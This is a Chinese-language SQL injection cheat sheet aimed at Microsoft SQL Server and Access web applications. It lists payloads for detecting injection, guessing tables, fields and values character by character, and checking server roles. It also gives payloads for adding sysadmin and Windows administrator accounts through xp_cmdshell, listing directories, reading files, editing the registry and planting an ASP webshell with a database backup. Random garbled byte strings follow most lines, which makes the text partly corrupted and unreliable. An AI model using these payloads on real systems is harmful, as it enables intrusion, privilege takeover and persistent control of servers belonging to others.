1.判断是否有注入;and 1=1 ;and 1=2 0p�BlmPafY
2.初步判断是否是mssql ;and user>0 �H8P��il H
#w�x0xQ~,J
3.注入参数是字符'and [查询条件] and ''=' [�-s0'���z
rS>njG;�R
4.搜索时没过滤参数的'and [查询条件] and '%25'=' !i�.�`m-J*
}Jjq]�l�W
5.判断数据库系统 FL(gw�f�L�
�O 4l[4,�`
;and (select count(*) from sysobjects)>0 mssql P�,xa���yy
EOVHTDk�Kf
;and (select count(*) from msysobjects)>0 access H�]}Iw5�Z�
ib/&8)Y+J�
E88_15'3�D
<IK8�Uc�p�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 /�<zBcpVNV
Ij@�Y�O�t�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 +�%UXI�$v
7 82NiV�ed
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 "MZVwl�"E#
7�Ku�TC%�7
9.(1)猜字段的ascii值(access) �~Jmn?9 3�
UKMrR9[x*
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 1i2j�YDB�"
JgY�aA*�1X
(2)猜字段的ascii值(mssql) d[-w&[iy��
9�oc.`-e\?
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 _�9\�ayR>d
~?�[%uGI0h
10.测试权限结构(mssql) S-.!BQ@RMZ
]/bf#&@g`k
�k�Tc�'k��
)Qp?�N<�&'
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 2[qO;�j�s
l_�>^LFO�A
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- vxk1R�L*Xu
vT\`0�di~�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��2@uo2]o)
�?�J%�$;"q
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- i/�-Xpj]Zf
*D�*K`dk��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- VISNmz�2�P
;IXDZ�#;��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �xwTN�\7f>
I$9�t^82j�
;and 1=(select IS_MEMBER('db_owner'));-- 7��ev�E;KL
y5BNHweaRb
8iqx*�8��}
gSL�$s�ilc
11.添加mssql和系统的帐户 :&&P�s4\Sq
q�yp"q{k0
;exec master.dbo.sp_addlogin username;-- w��# �,:L)
;exec master.dbo.sp_password null,username,password;-- >9uDY+70I3
hi`�\�3�B�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- FL/@�e$AK�
"9�&��6bBa
;exec master.dbo.xp_cmdshell 'net user username password zRL�[�.�O9
!� Hdg
$�,
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �H2E!A2�\m
K$R1x1�lc2
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �&]�16H�b~
}yK_2zak5i
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- A^�bg�*t�,
F4�Y�C�U$V
j�'X]bd�'�
\&Mipf7�a
12.(1)遍历目录 �1EyM,$On�
#-�f�7�hg*
;create table dirs(paths varchar(100), id int) TPvS+_<oL{
=H��QH;c"�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ���aq��o�T
;Z�Fn~��!V
;and (select top 1 paths from dirs)>0 ZV,n-�M =
7K
{��/2�k
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) t
/EB
y"N#
%kKe�"$�)0
&owB�m�pz�
l`[�*b_
Xt
(2)遍历目录 ��B&O931E7
�m%qah>�11
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ^z�"9�0-V^
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 qyP@�[8eH
�<,`=m|z9k
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �2%r�Af�8=
O�5{
>���k
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 IT'~.!o7/�
�b�J�x{mq
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Ny��e�G�a�
�%h4p�I�A�
.px*.e� �s
��ne�oT\HV
13.mssql中的存储过程 4��u"V�52
rgRh ySud�
xp_regenumvalues 注册表根键, 子键 �OzA"i� y�
U~�s&}M\�n
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 X�%h1r`h&�
[6FCb�zS_W
xp_regread 根键,子键,键值名 u;F+�+�$�=
n^UrHH�OL
;exec xp_regread �iKv��{)�5
>���C*��q
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 1WfN_JKB5�
Y�6?d�
y\
xp_regwrite 根键,子键, 值名, 值类型, 值 kC!7��<%(�
B���+��`m�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 KNi�c$:�i�
A%�"m�yS�W
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 n,wLk.�/`�
dp�&4G6Y<A
xp_regdeletevalue 根键,子键,值名 Fm#4;'x5E�
�V��2u^s�y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 lw\O���sB$
7����1z$a
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��ujX�C#r&
W�W:@%�cQ@
F7E��#���x
� ��=SR�p�
14.mssql的backup创建webshell Vv
�B�%,_\
S_y!�4;]ox
use model 3G~ T_J�&�
�#6� ��e�
create table cmd(str image); �`|8)A)ZVT
=4RnX�Z[P0
insert into cmd(str) values (''); �)U6T]1���
�HH&`�f�3�
backup database model to disk='c:\l.asp'; G)?�VC^�Q�
+w?RW^�:Q=
�9��F(�<n�
2ZN�Tj u7h
15.mssql内置函数 yxf�|Njo�0
^�*C8BzcH
;and (select @@version)>0 获得Windows的版本号 �exiCy�1[+
'� &^:@��V
;and user_name()='dbo' 判断当前系统的连接用户是不是sa od"Oq?~�/t
+Tf��,�2?O
;and (select user_name())>0 爆当前系统的连接用户 �l`�:M/z6"
�"]f0wLzh�
;and (select db_name())>0 得到当前连接的数据库 l5b?�
�'�L
.��,)NDG4Q
0V
u��G(O�
@�{+c�6.*}
16.简洁的webshell ULIbVy7�Y�
frWw-<�HoI
use model 4N[8�LC;MH
q~^J�d=cB\
create table cmd(str image); �bJ*jJl� x
GPy+�\�P�`
insert into cmd(str) values (''); nbj��&�3z,
\S{is�e/U�
backup database model to disk='g:\wwwtest\l.asp';
